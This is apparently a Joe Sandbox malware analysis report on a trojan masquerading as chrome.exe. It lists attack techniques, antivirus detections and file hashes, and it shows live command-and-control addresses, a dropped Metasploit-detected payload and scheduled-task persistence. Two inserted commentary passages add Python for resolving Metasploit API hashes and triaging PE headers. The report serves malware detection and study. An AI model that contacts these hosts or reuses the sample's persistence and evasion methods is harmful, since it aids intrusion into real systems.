Privilege Escalation: 11 Process Injection; 1 Scheduled Task/Job; 1 Extra Window Memory Injection; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 21 Virtualization/Sandbox Evasion; 11 Process Injection; 21 Obfuscated Files or Information; 11 Software Packing; 1 Extra Window Memory Injection
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 111 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 1 File and Directory Discovery; 12 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact
Behavior Graph

Behavior Graph ID: 1270926 | Sample: chrome.exe | Startdate: 11/07/2023 | Architecture: WINDOWS | Score: 100
Start node signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures
chrome.exe (first instance) started; contacts 128.199.113.162 (ports 49690, 49692, 80; DIGITALOCEAN-ASNUS; United Kingdom); dropped C:\Users\user\AppData\...\s1szwqo5.shl.exe (PE32+) and C:\Users\user\AppData\...\chrome.exe.log (CSV); signature: Uses schtasks.exe or at.exe to add and modify task schedules; starts s1szwqo5.shl.exe, schtasks.exe, schtasks.exe
chrome.exe (second instance) started; starts schtasks.exe, schtasks.exe
s1szwqo5.shl.exe started; contacts 104.248.194.233 (ports 443, 49691; DIGITALOCEAN-ASNUS; United States); signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file
Each schtasks.exe starts conhost.exe

Source | Detection | Scanner | Label
chrome.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.Leonem
chrome.exe | 65% | Virustotal
chrome.exe | 100% | Avira | HEUR/AGEN.1313362
chrome.exe | 100% | Joe Sandbox ML

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe | 100% | Avira | TR/Crypt.XPACK.Gen7
C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe | 100% | Joe Sandbox ML

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://128.199H | 0% | Avira URL Cloud | safe
http://128.199.113.162 | 100% | Avira URL Cloud | malware
http://128.199.113.162 | 12% | Virustotal
http://128.199.113.162x | 0% | Avira URL Cloud | safe
http://128.199.113.162/upwawsfrg.php?zd=1 | 100% | Avira URL Cloud | malware
http://128.199.113.162/upwawsfrg.php | 100% | Avira URL Cloud | malware
http://128.199.113.162/upwawsfrg.php | 14% | Virustotal
              No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://128.199.113.162/upwawsfrg.php?zd=1 | false | Avira URL Cloud: malware | unknown
http://128.199.113.162/upwawsfrg.php | false | 14%, Virustotal; Avira URL Cloud: malware | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://128.199H | chrome.exe, 00000000.00000002.563398385.000002715726C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.563398385.0000027157252000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.563398385.0000027157252000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://128.199.113.162x | chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://128.199.113.162 | chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.563398385.0000027157252000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | false | 12%, Virustotal; Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
128.199.113.162 | unknown | United Kingdom | 14061 | DIGITALOCEAN-ASNUS | false
104.248.194.233 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
Joe Sandbox Version: 38.0.0 Beryl
Analysis ID: 1270926
Start date and time: 2023-07-11 15:46:11 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: chrome.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@16/4@0/2
EGA Information:
• Successful, ratio: 33.3%
HDC Information:
• Successful, ratio: 66.3% (good quality ratio 43.6%)
• Quality average: 33%
• Quality standard deviation: 31.7%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 34
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): audiodg.exe
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Execution Graph export aborted for target chrome.exe, PID 5612 because it is empty
• Execution Graph export aborted for target chrome.exe, PID 5780 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
15:47:13 | Task Scheduler | Run new task: WinTask path: C:\Users\user\Desktop\chrome.exe
15:47:17 | API Interceptor | 2x Sleep call for process: chrome.exe modified
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
DIGITALOCEAN-ASNUS | aS5q94Hr72.exe | malicious | Lokibot | 138.68.56.139
DIGITALOCEAN-ASNUS | mips-20230711-1121.elf | malicious | Mirai, Moobot | 134.122.107.40
DIGITALOCEAN-ASNUS | Prijsaanvraag_(Katholieke_Universiteit_Leuven.exe | malicious | GuLoader, Lokibot | 138.68.56.139
DIGITALOCEAN-ASNUS | Demande_de_devis_(Universite_Paris_Cite_2307E.exe | malicious | GuLoader, Lokibot | 138.68.56.139
DIGITALOCEAN-ASNUS | SFILEMBDOWN_D2zAJuzTqcTMUUGJaN802V5EQErviowPq558#U00aexrlsk.msi | malicious | Unknown | 142.93.100.140
DIGITALOCEAN-ASNUS | Richiesta_Preventivo_(ISGB)_7788EU_-_0605ITA#U00b7pdf.exe | malicious | GuLoader, Lokibot | 138.68.56.139
DIGITALOCEAN-ASNUS | gCfJZyW5P9y6kQ6.exe | malicious | Lokibot | 138.68.56.139
DIGITALOCEAN-ASNUS | TNT_Express_1Z3136W7049359723.exe | malicious | Lokibot | 138.68.56.139
DIGITALOCEAN-ASNUS | FedEx_Receipt_71310373717.exe | malicious | Lokibot | 138.68.56.139
DIGITALOCEAN-ASNUS | DHL_Receipt_AWB8114550418778.exe | malicious | Lokibot | 138.68.56.139
DIGITALOCEAN-ASNUS | FedEx_Receipt_72310373717.exe | malicious | Lokibot | 138.68.56.139
DIGITALOCEAN-ASNUS | DHL_Receipt_AWB8114770418778.exe | malicious | Lokibot | 138.68.56.139
DIGITALOCEAN-ASNUS | gbzgfumjtV.exe | malicious | Lokibot | 138.68.56.139
DIGITALOCEAN-ASNUS | 4A2KE7woIs.exe | malicious | Lokibot | 138.68.56.139
DIGITALOCEAN-ASNUS | Facturas_Pagadas_al_Vencimiento.PDF.exe | malicious | FormBook | 128.199.218.78
DIGITALOCEAN-ASNUS | DHL_Express_AWB#3020098038.exe | malicious | Lokibot | 138.68.56.139
DIGITALOCEAN-ASNUS | https://1xwin.bet | malicious | Unknown | 134.122.54.186
DIGITALOCEAN-ASNUS | Downloa_FIL_3vf5iTDDfg0eAy8jpo9MreZxNTG8ELsdfgsdfgWERK70#U00aexlsk.msi | malicious | Unknown | 142.93.100.140
DIGITALOCEAN-ASNUS | https://7xqcio7f.page.link/NLtk | malicious | Unknown | 134.122.57.34
DIGITALOCEAN-ASNUS | https://chipotle.app.link/?$3p=e_et&$fallback_url=https%3A%2F%2Fresgianyar.bali.polri.go.id%2Fc2ss%2Fadmine%2F15%2F%2F%2F%2FY2hlcmFsZWUua2F0dGVuYnVyZ0BhbGdvbWEuY29t | malicious | HTMLPhisher | 164.90.228.169
No context
                Process:C:\Users\user\Desktop\chrome.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):1492
                Entropy (8bit):5.372936244823406
                Encrypted:false
                SSDEEP:24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhwE4iUKIE4TKD1KoZAE4KKPz:MxHKn1qHGiD0HKeGiYHKGD8AowHiUtHt
                MD5:4D233D278CCA82225C230BD444D139F2
                SHA1:DBBEF20096B07EAD12697D9DDE4D8E6FEAB89EA1
                SHA-256:DF38254760ABB2BC4CFB7FA345D82952DEE4471099065773A386EF4EC5073687
                SHA-512:702A4C13BEBCA9045BCBEB8CDCE6F302E88A764101992E700E49CD2BA872AB91F0CA8C3A01AC07BC320F01FA3C145A9EBFCC368DBE440873DB7C4AC4950A7F6E
                Malicious:true
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System
                Process:C:\Users\user\Desktop\chrome.exe
                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                Category:dropped
                Size (bytes):84456
                Entropy (8bit):7.899562735115553
                Encrypted:false
                SSDEEP:1536:C5IBOvUa5r3vjZ5MN9wT7NLKnyPjPTv6SpW0gkZcQn17t3bvoygKceDSs5OV3kt5:yI8ljvj4ETRLKyHydSf17B39DSGOatoi
                MD5:CD154F131C1080CDCA69476044A96D40
                SHA1:C7820235850D14CBB2D22C836ACE3D9A23985D60
                SHA-256:B6865AC4479DD3D8D024FF79030F0A3FDEE0F7A778E84AEA76991168483F9E56
                SHA-512:23EF0AAD0E8A1443EE75A28EF2B9C337FEE31F10B5EE37203A712CB8DB297DE4E717E5FFE9EB2551C5DB9DBBCF9A4ED76011E8AE2DCA4B9DFE2C9B1CA24DA3E1
                Malicious:false
                Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%...d....
                Process:C:\Users\user\Desktop\chrome.exe
                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                Category:dropped
                Size (bytes):89439
                Entropy (8bit):7.907715148464475
                Encrypted:false
                SSDEEP:1536:C5IBOvUa5r3vjZ5MN9wT7NLKnyPjPTv6SpW0gkZcQn17t3bvoygKceDSs52E9jTT:yI8ljvj4ETRLKyHydSf17B39DSGl1T4m
                MD5:FDA04654A1B484198A0B2A9F1D6DBC42
                SHA1:D396035743859EF42F0D0368E2F4BEB7E0560629
                SHA-256:374DF70FB11C5B0001116ACE790BD08702D1905AA39F0C96B3070D0E0D5B2EAA
                SHA-512:75C784848E609EAA5DE4B419C105D749C35090DC3E9B6DC1A80D4A2C353E8D5F436A0D86EF5990CA1C7497A430125BAEAAA67EB0214726FBDC5FCFE61DE2A3EB
                Malicious:false
                Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%...d....
                Process:C:\Users\user\Desktop\chrome.exe
                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):7168
                Entropy (8bit):1.4900071764412044
                Encrypted:false
                SSDEEP:24:eFGStrJ9u0/6PuU/knZdEBQAVbYfwKLqIGeNDMSCzC/V1ilg9HeH5m+ipmB:is0b0IEBQToHSD9CmtolgJe8SB
                MD5:468F9575A65D99F52FA2B52C505F59A6
                SHA1:BACB70F9A8ABDA0E15DA98A2289F3ED26062DA83
                SHA-256:7E0B5396F1F00177E19B7887137DCC314DCCEE09F5855C1B6A60129C65310A24
                SHA-512:D701FCD45B785CCFDD60E0BF3829479C41EA52CDDFC84078F1EFE19340A82041137E66FD4F95AB0772E1821554297D7DA482EA4E0502386643B576F073B52094
                Malicious:true
                Yara Hits:
                • Rule: JoeSecurity_MetasploitPayload_2, Description: Yara detected Metasploit Payload, Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, Author: Joe Security
                • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, Author: Joe Security
                • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, Author: unknown
                • Rule: Windows_Trojan_Metasploit_91bc5d7d, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, Author: unknown
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9$..}E..}E..}E..Z...~E..}E~..E..t=.|E..t=.|E..Rich}E..................PE..d...}<.K..........#......0...........@.........@.............................C..H............................................................B..l............................C.......................................................0...............................text...N........................... ..`.rdata.......0......................@..@.ftrs........@...................... ...................................................................................................................................................................................................................................................................................................................................................................................................................................
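The Yara hits on the dropped s1szwqo5.shl.exe fire on the ROR13 API-hashing routine that Metasploit's block_api stub uses to locate exports without an import table, which is also why the rule text notes it has been re-used by many other families: the rule matches the hashing code, not any particular hash constant. The Python below is an added example, not part of this report or of Metasploit, that reproduces the scheme (module name upper-cased as UTF-16LE including its terminating wide NUL, export name as ASCII including its NUL, ROR-13 then 32-bit ADD per byte, the two hashes summed) and brute-forces constants pulled from a blob back to names from a candidate list. It is checked against the value Metasploit's block_api.asm documents for kernel32.dll!LoadLibraryA, 0x0726774C; the candidate export list is my own assumption.

```python
MASK32 = 0xFFFFFFFF


def ror32(value: int, bits: int) -> int:
    """Rotate a 32-bit value right, as the x86/x64 ROR instruction does."""
    value &= MASK32
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def hash_bytes(data: bytes, bits: int = 13) -> int:
    """block_api core loop: ROR the accumulator by 13, then ADD the next byte
    with 32-bit wraparound. The x64 stub does the same arithmetic on r9d."""
    acc = 0
    for b in data:
        acc = (ror32(acc, bits) + b) & MASK32
    return acc


def module_hash(module: str) -> int:
    """Module names are hashed as the loader stores them in BaseDllName:
    upper-cased UTF-16LE, including the terminating wide NUL."""
    return hash_bytes((module.upper() + "\0").encode("utf-16-le"))


def function_hash(function: str) -> int:
    """Export names are hashed as ASCII from the export name table, NUL included."""
    return hash_bytes((function + "\0").encode("ascii"))


def api_hash(module: str, function: str) -> int:
    """The constant pushed before 'call ebp' / 'call rbp' is the 32-bit sum of both."""
    return (module_hash(module) + function_hash(function)) & MASK32


# Candidate exports for brute-force resolution. Assumed list for illustration;
# extend it from real export tables when working on a sample.
COMMON_EXPORTS = {
    "kernel32.dll": ["LoadLibraryA", "VirtualAlloc", "VirtualProtect", "WinExec",
                     "ExitProcess", "ExitThread", "GetVersion", "CreateThread",
                     "WaitForSingleObject", "Sleep"],
    "ws2_32.dll": ["WSAStartup", "WSASocketA", "connect", "bind", "listen",
                   "accept", "recv", "send", "closesocket"],
    "wininet.dll": ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                    "HttpSendRequestA", "InternetReadFile", "InternetSetOptionA"],
}


def resolve_hashes(constants, table=COMMON_EXPORTS) -> dict:
    """Map 32-bit constants found in a shellcode blob back to (module, export).
    Unresolved constants map to None so the caller can see what is still unknown."""
    lookup = {api_hash(m, f): (m, f) for m, funcs in table.items() for f in funcs}
    return {c & MASK32: lookup.get(c & MASK32) for c in constants}


if __name__ == "__main__":
    # 0x0726774C is the value Metasploit's block_api.asm documents for
    # hash("kernel32.dll", "LoadLibraryA").
    print(hex(api_hash("kernel32.dll", "LoadLibraryA")))
    print(resolve_hashes([0x0726774C, 0xDEADBEEF]))
```

When triaging a blob like this one, the useful workflow is to pull every 32-bit immediate that precedes a `call ebp`/`call rbp`, run it through resolve_hashes, and read the resulting import list the way you would read an IAT; anything still unresolved is a hint to widen the candidate table rather than a sign that a different hash is in use.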
                File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                Entropy (8bit):7.92887671203156
                TrID:
                • Win64 Executable GUI Net Framework (217006/5) 49.88%
                • Win64 Executable GUI (202006/5) 46.43%
                • Win64 Executable (generic) (12005/4) 2.76%
                • Generic Win/DOS Executable (2004/3) 0.46%
                • DOS Executable Generic (2002/1) 0.46%
                File name:chrome.exe
                File size:1'142'288 bytes
                MD5:b2eaf44f5d0ea664e504c9c8c6c42d23
                SHA1:c79f1dccf4aa3a973f9a5ad54e6f0d9497066971
                SHA256:8897994e897bb1b2d22188d332ea972eff725b3b02b9dab0e5b5e73ab60d79c4
                SHA512:d8287aa71ebac553d09ea1bb8665cb2b8f60686ab20e96250f859fc215c69f72d807a9516c38d9ccf6a045348c2fb9fe3bf3bed2e9622ae2dd6e9910178c995b
                SSDEEP:6144:YLrHrk/uujGA3z6Ed1w7dgEMMMM7MMMM7MMMM7MMMM7MMMM7MMMM7MMMM7MMMM7U:UH4/uuj96MC7d8
                TLSH:6335C053542E8F52D67957F8BE470A7F9F31166DD8C2289E225B0D833E617A384CE02E
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Pd.........."...0..>............... .....@..... ....................................`...@......@............... .....
                Icon Hash:0733c9ccccc94307
                Entrypoint:0x140000000
                Entrypoint Section:
                Digitally signed:false
                Imagebase:0x140000000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Time Stamp:0x6450F1D3 [Tue May 2 11:19:47 2023 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:
Instruction (disassembly at the entry point 0x140000000; since the entry point RVA is 0, these are the bytes of the DOS header "MZ" stub, not real code)
                dec ebp
                pop edx
                nop
                add byte ptr [ebx], al
                add byte ptr [eax], al
                add byte ptr [eax+eax], al
                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x116000 | 0x2c02 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x113cb8 | 0x113e00 | False | 0.16893956020616221 | data | 7.939923426280949 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x116000 | 0x2c02 | 0x2e00 | False | 0.30825407608695654 | data | 4.950463504743286 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x116130 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | - | - | 0.29896265560165974
RT_GROUP_ICON | 0x1186d8 | 0x14 | data | - | - | 1.15
RT_VERSION | 0x1186ec | 0x32c | data | - | - | 0.4273399014778325
RT_MANIFEST | 0x118a18 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | - | - | 0.5489795918367347
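Three of the static signatures in this report ("PE file does not import any functions", "Entry point lies outside standard sections" and the empty "Entrypoint Section" field) follow directly from the header values listed above: the import and IAT directories are 0x0/0x0, the entry point 0x140000000 equals the image base (RVA 0, which lands in the DOS header rather than in .text, whose first RVA is 0x2000), and the COM descriptor directory at 0x2000 marks the file as a managed image. PE32+ .NET images produced by current compilers commonly look exactly like this, because the Windows loader starts the CLR from the COM descriptor directory and needs neither a native import table nor an entry-point stub, so those two signatures describe the file type rather than prove packing on their own; the .text entropy of 7.94 and the "potential unpacker" finding are what carry that weight. The Python below is an added example, not Joe Sandbox code, that builds a header-only PE32+ image with this report's values and extracts those three facts using only struct; the byte layout is the constructed sample's, the field offsets are the PE specification's.

```python
import struct

# Data-directory indices from the PE specification.
DIR_IMPORT = 1
DIR_RESOURCE = 2
DIR_COM_DESCRIPTOR = 14


def build_sample_pe() -> bytes:
    """Constructed header-only PE32+ image with this report's values:
    ImageBase 0x140000000, AddressOfEntryPoint 0, no import directory,
    CLR header at RVA 0x2000 (size 0x48), .text at 0x2000, .rsrc at 0x116000.
    Section bodies are omitted; header triage never reads them."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 2, 0x6450F1D3, 0, 0, 240, 0x0022)
    opt = bytearray(240)                                           # PE32+ optional header
    struct.pack_into("<H", opt, 0, 0x20B)                          # magic: PE32+
    struct.pack_into("<I", opt, 16, 0)                             # AddressOfEntryPoint
    struct.pack_into("<Q", opt, 24, 0x140000000)                   # ImageBase
    struct.pack_into("<II", opt, 32, 0x2000, 0x200)                # Section/File alignment
    struct.pack_into("<I", opt, 108, 16)                           # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112 + 8 * DIR_RESOURCE, 0x116000, 0x2C02)
    struct.pack_into("<II", opt, 112 + 8 * DIR_COM_DESCRIPTOR, 0x2000, 0x48)
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0x113CB8, 0x2000, 0x113E00,
                       0x200, 0, 0, 0, 0, 0x60000020)
    sect += struct.pack("<8sIIIIIIHHI", b".rsrc", 0x2C02, 0x116000, 0x2E00,
                        0x114000, 0, 0, 0, 0, 0x40000040)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect


def triage_pe_headers(data: bytes) -> dict:
    """Answer three questions from the headers alone: which section holds the
    entry point (None = outside every section), is there an import table, and
    does a CLR header mark the file as managed code."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsect = struct.unpack_from("<H", data, pe_off + 6)[0]
    size_opt = struct.unpack_from("<H", data, pe_off + 20)[0]
    opt = pe_off + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    if magic == 0x20B:                                             # PE32+
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
        ndirs_off, dirs_off = opt + 108, opt + 112
    elif magic == 0x10B:                                           # PE32
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
        ndirs_off, dirs_off = opt + 92, opt + 96
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    ndirs = struct.unpack_from("<I", data, ndirs_off)[0]

    def directory(index):
        if index >= ndirs:
            return 0, 0
        return struct.unpack_from("<II", data, dirs_off + 8 * index)

    sections = []
    for i in range(nsect):
        name, vsize, va, rawsize = struct.unpack_from("<8sIII", data, opt + size_opt + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), va, max(vsize, rawsize)))

    def section_of(rva):
        for name, va, size in sections:
            if va <= rva < va + size:
                return name
        return None

    import_rva, import_size = directory(DIR_IMPORT)
    clr_rva, clr_size = directory(DIR_COM_DESCRIPTOR)
    return {
        "entry_va": image_base + entry_rva,
        "entry_section": section_of(entry_rva),
        "has_imports": bool(import_rva and import_size),
        "is_managed": bool(clr_rva and clr_size),
        "clr_section": section_of(clr_rva) if clr_rva else None,
        "sections": [name for name, _, _ in sections],
    }


if __name__ == "__main__":
    print(triage_pe_headers(build_sample_pe()))
```

Run against a real file, `triage_pe_headers(open(path, "rb").read())` gives the same dictionary; a native image with `is_managed` False and `has_imports` False at the same time is the combination that genuinely deserves a packing suspicion, whereas `is_managed` True with an empty import table is the normal shape of a 64-bit .NET build.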
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 11, 2023 15:47:15.393855095 CEST | 49690 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:15.587534904 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:15.587662935 CEST | 49690 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:15.589050055 CEST | 49690 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:15.782777071 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
